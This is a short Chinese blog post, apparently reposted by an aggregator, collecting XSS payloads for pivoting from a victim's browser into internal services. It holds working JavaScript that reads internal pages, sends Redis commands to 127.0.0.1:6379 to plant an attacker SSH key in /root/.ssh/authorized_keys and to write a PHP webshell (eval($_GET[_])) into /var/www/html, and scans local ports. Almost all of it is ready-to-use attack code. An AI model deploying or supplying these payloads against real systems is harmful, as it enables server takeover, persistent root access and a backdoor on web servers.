XSS 相关 payload 集合
Posted hac425
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS 相关 payload 集合相关的知识,希望对你有一定的参考价值。
Ajax 获取数据
GET
function loadXMLDoc()
{
var xmlhttp;
if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else{// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function(){
if (xmlhttp.readyState==4 && xmlhttp.status==200){
document.getElementById("out").innerhtml=xmlhttp.responseText;
}
}
xmlhttp.open("GET","http://127.0.0.1:80/",true);
xmlhttp.send();
}
var a =document.createElement("a");
a.id = "out";
bd = document.getElementsByTagName("body")[0];
bd.appendChild(a);
loadXMLDoc();POST 写 redis
写 ssh 公钥
var keydir = "/root/.ssh";
var cmd = new XMLHttpRequest();
cmd.open("POST", "http://127.0.0.1:6379");
cmd.send(‘eval ‘‘ + ‘redis.call("set", "hacked", "\r\n\nssh-rsa AAAAB... [email protected]\n\n\n\n"); redis.call("config", "set", "dir", "‘ + keydir + ‘/"); redis.call("config", "set", "dbfilename", "authorized_keys"); ‘ + ‘‘ 0‘ + "
");
var cmd = new XMLHttpRequest();
cmd.open("POST", "http://127.0.0.1:6379");
cmd.send(‘save
‘);写 php webshell
<a id="flag">pwn</ a>
level=low_273eac1c
<script>
var xmlHttp;
if(window.XMLHttpRequest){
xmlHttp = new XMLHttpRequest();
}
else{
xmlHttp = newActiveXObject("Microsoft.XMLHTTP");
}
var formData = new FormData();
formData.append("0","flushall"+"
"+"config set dir /var/www/html/"+"
"+"config set dbfilename shell.php"+"
"+‘set 1 "\n\n<?php header(‘Access-Control-Allow-Origin:*‘);eval($_GET[_]);?>\n\n"‘+"
"+"save"+"
"+"quit");
xmlHttp.open("POST","http://127.0.0.1:6379",true);
xmlHttp.send(formData);
</script>来源
https://xz.aliyun.com/t/2607#toc-2
https://strcpy.me/index.php/archives/751/端口扫描
payload
var TagName = document.getElementsByTagName("body")[0];
ports=[443,80,81,88,6379,8000,8080,8088];
for(var i in ports){
var script = document.createElement("script");
poc = "var data = ‘" + ports[i] + " OPEN; ‘; console.log(data);"
script.setAttribute("src","http://127.0.0.1:" + ports[i]);
script.setAttribute("onload", poc);
TagName.appendChild(script);
}来源
https://xz.aliyun.com/t/2607#toc-2以上是关于XSS 相关 payload 集合的主要内容,如果未能解决你的问题,请参考以下文章